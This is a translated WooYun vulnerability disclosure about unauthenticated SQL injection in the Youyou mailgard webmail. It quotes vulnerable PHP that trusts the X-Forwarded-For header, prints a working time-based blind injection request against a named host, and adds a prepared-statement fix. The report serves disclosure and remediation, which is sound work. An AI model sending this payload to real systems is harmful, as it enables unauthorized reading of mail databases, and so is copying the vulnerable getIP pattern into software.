
Vulnerability summary

Defect ID: wooyun-2015-0104763

Title: 佑友 (Youyou) mailgard webmail, SQL injection without login, three locations

Vendor: 深圳市河辰通讯技术有限公司 (Shenzhen Hechen Communication Technology Co., Ltd.)

Author: 路人甲

Submitted: 2015-03-31 16:27

Fixed: 2015-07-03 18:44

Published: 2015-07-03 18:44

Type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: handed over to a third-party partner organisation (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability details

Disclosure status:

2015-03-31: details sent to the vendor, awaiting the vendor's handling
2015-04-04: vendor has confirmed; details disclosed to the vendor only
2015-04-07: details opened to third-party security partners
2015-05-29: details opened to core white hats and domain experts
2015-06-08: details opened to ordinary white hats
2015-06-18: details opened to intern white hats
2015-07-03: details opened to the public

Brief description:

A mail system; no login required; three locations.

Detailed description:

mailgard webmail:
register.php:

if($_SERVER['REQUEST_METHOD'] == 'POST'){
    // $realip comes from getIP() below, which prefers the client-controlled
    // X-Forwarded-For / Client-IP headers over the socket address.
    $realip = getIP();
    $users_id = strtolower($_POST['users_id']);
    $email_suffix = strtolower($_POST['email_suffix']);
    $username = $users_id."@".$email_suffix;
    $users_truename = $_POST['users_truename'];
    $users_pass = $_POST['users_pass'];
    $pass_strength = $_POST['pass_strength'];
    $company = $_POST['company'];
    $department = $_POST['department'];
    $tel = $_POST['tel'];
    $apptime = time();

    require_once HM_ROOT.'./class/HicomMd5.class.php';
    $hicommd5 = new HicomMd5;
    $users_pass = $hicommd5->md5crypt($users_pass);

    // Every value is interpolated straight into the SQL string; nothing is
    // escaped or bound as a parameter. The POST fields are at least subject
    // to magic_quotes_gpc where that is enabled; $realip is read from
    // $_SERVER, which magic quotes never touch, so the header reaches the
    // query exactly as the client sent it.
    $sql = "INSERT INTO `register` (`username`,`uid`,`domain`,`password`,`pass_strength`,`truename`,`company`,`department`,`tel`,`ip`,`apptime`) VALUES ('$username','$users_id','$email_suffix','$users_pass','$pass_strength','$users_truename','$company','$department','$tel','$realip','$apptime')";
    if($result = $db->query($sql)) {
        $alt_str = $language['register_success'];
    }else{
        $alt_str = $language['register_fail'];
    }
}


getIP(), the source of $realip, is defined as:

function getIP()
{
    static $realip;
    // X-Forwarded-For and Client-IP are ordinary request headers: any client
    // can send them, and nothing here checks that a trusted proxy set them or
    // that the value is even an IP address. REMOTE_ADDR, the only value the
    // client cannot choose, is used last.
    if (isset($_SERVER)){
        if (isset($_SERVER["HTTP_X_FORWARDED_FOR"])){
            $realip = $_SERVER["HTTP_X_FORWARDED_FOR"];
        } else if (isset($_SERVER["HTTP_CLIENT_IP"])) {
            $realip = $_SERVER["HTTP_CLIENT_IP"];
        } else {
            $realip = $_SERVER["REMOTE_ADDR"];
        }
    } else {
        if (getenv("HTTP_X_FORWARDED_FOR")){
            $realip = getenv("HTTP_X_FORWARDED_FOR");
        } else if (getenv("HTTP_CLIENT_IP")) {
            $realip = getenv("HTTP_CLIENT_IP");
        } else {
            $realip = getenv("REMOTE_ADDR");
        }
    }
    return $realip;
}


Test (the payload is carried in the X-Forwarded-For header; the form fields are ordinary values):

POST /register.php HTTP/1.1
Host: mail.iconergy.com:889
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://mail.iconergy.com:889/register.php
Cookie: PHPSESSID=7l7vsdp8r82enfq8016fh2adk7; _HICOM[LANGUAGE]=zh-cn
X-Forwarded-For: 8.8.8.8',if(ascii(substr(version(),1,1))=53,sleep(5),1))#
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 182

isGo=&users_id=test123&email_suffix=iconergy.com&users_pass=test123test123&pass_strength=2&users_pass2=test123test123&users_truename=test123&company=test123&department=23&tel=test123
The leading quote closes the '$realip' literal, the if() expression lands in the `apptime` slot of the VALUES list, and the '#' comments out the rest of the statement. The response is delayed by five seconds only when the condition holds, so any select can be evaluated one character at a time and the whole database read out blind.
The other files that use the IP the same way are:
sso.php:

    $_SESSION['_HM_S'] = array();
}else {
    session_register('_HM_S');
}
$realip = getIP();
if($act == 'update'){
    // $realip is concatenated into the UPDATE without escaping; the INSERT
    // branch is cut off on the original page.
    $db->query('UPDATE `ssomanage` SET `mail_account`="'.$accounts.'",`pwd`="'.encrypt($password,'fabb14acf4f01ed797e523d03288302').'",`ip`="'.$realip.'",`date`="'.time().'" WHERE `other_sys`="'.$user.'"');
}else{
    $db->query('INSERT INTO `ssomanage` (`mail_account`,`pwd`,`other_sys`,`i


login.php:

}
if(session_is_registered('_HM_S')) {
    $_SESSION['_HM_S'] = array();
}else {
    session_register('_HM_S');
}
$realip = getIP();
// Same pattern: the header-derived $realip goes into the UPDATE unescaped.
$db->query("UPDATE `hicom_activeusers` SET `login_date`=NOW(),`ip`='".$realip."',`sess_id`='".session_id()."' WHERE `username`='$accounts'");
$_SESSION['_HM_S']['USERNAME'] = $username;


Proof of vulnerability:

Fix recommendation:
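The fix section of the original report is empty. As an added example, not the vendor's patch, here is how register.php would look with the two independent changes a reviewer would ask for: only honour X-Forwarded-For when the TCP peer is one of your own reverse proxies and validate the result as an IP literal, and build the INSERT with a prepared statement so no value can alter the statement's structure. The DSN, credentials and trusted-proxy address are assumptions; the password hashing is left exactly as on the page. The same two changes apply to the UPDATE statements in sso.php and login.php.

```php
<?php
// Added example, not the vendor's patch. DSN, credentials and the
// trusted-proxy address are assumptions; HicomMd5 and HM_ROOT are the
// project's own, used as on the original page.

// Hardened replacement for getIP(). X-Forwarded-For is honoured only when the
// socket peer is a trusted proxy, and then only the entry that proxy appended
// (the last one; earlier entries are whatever the client sent). With a chain
// of trusted proxies, walk the list from the right instead of taking end().
function getIP(array $trustedProxies = []): string
{
    $remote = $_SERVER['REMOTE_ADDR'] ?? '';
    $candidate = $remote;

    if (in_array($remote, $trustedProxies, true) && !empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
        $hops = array_map('trim', explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']));
        $candidate = end($hops);
    }

    // Syntactic check: anything that is not an IPv4/IPv6 literal is dropped.
    // This alone rejects the payload from the report, but it is a second line
    // of defence, not a substitute for the prepared statement below.
    if (filter_var($candidate, FILTER_VALIDATE_IP) === false) {
        return $remote;
    }
    return $candidate;
}

// Hardened replacement for the INSERT in register.php. $passwordHash is the
// value produced by the existing md5crypt() call; hashing is unchanged here.
function register_user(PDO $db, array $post, string $realip, string $passwordHash): bool
{
    $usersId = strtolower($post['users_id'] ?? '');
    $suffix  = strtolower($post['email_suffix'] ?? '');

    $sql = 'INSERT INTO `register`
            (`username`,`uid`,`domain`,`password`,`pass_strength`,`truename`,
             `company`,`department`,`tel`,`ip`,`apptime`)
            VALUES (:username,:uid,:domain,:password,:pass_strength,:truename,
                    :company,:department,:tel,:ip,:apptime)';
    $stmt = $db->prepare($sql);
    // Every user-supplied value travels as a bound parameter, never as SQL text.
    return $stmt->execute([
        ':username'      => $usersId . '@' . $suffix,
        ':uid'           => $usersId,
        ':domain'        => $suffix,
        ':password'      => $passwordHash,
        ':pass_strength' => (int) ($post['pass_strength'] ?? 0),
        ':truename'      => $post['users_truename'] ?? '',
        ':company'       => $post['company'] ?? '',
        ':department'    => $post['department'] ?? '',
        ':tel'           => $post['tel'] ?? '',
        ':ip'            => $realip,
        ':apptime'       => time(),
    ]);
}

// Assumed connection setup. Turning prepare emulation off makes the driver
// send parameters separately from the statement in the MySQL protocol,
// rather than quoting them client-side.
$db = new PDO('mysql:host=127.0.0.1;dbname=mailgard;charset=utf8mb4', 'mailgard', 'secret', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false,
]);

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $realip = getIP(['10.0.0.5']);          // assumed reverse-proxy address

    require_once HM_ROOT.'./class/HicomMd5.class.php';
    $hicommd5 = new HicomMd5;
    $users_pass = $hicommd5->md5crypt($_POST['users_pass'] ?? '');

    $alt_str = register_user($db, $_POST, $realip, $users_pass)
        ? $language['register_success']
        : $language['register_fail'];
}
```

If the application is not behind a reverse proxy at all, pass an empty trusted-proxy list and getIP() reduces to REMOTE_ADDR, which is the only address the client cannot choose.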

Copyright notice: when reprinting, please credit 路人甲@乌云


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2015-04-04 18:42

Vendor reply:

CNVD has confirmed and reproduced the described situation, and has notified the website's operating unit (the software vendor) through its publicly listed contact details (or a previously established handling channel).

Latest status:

None yet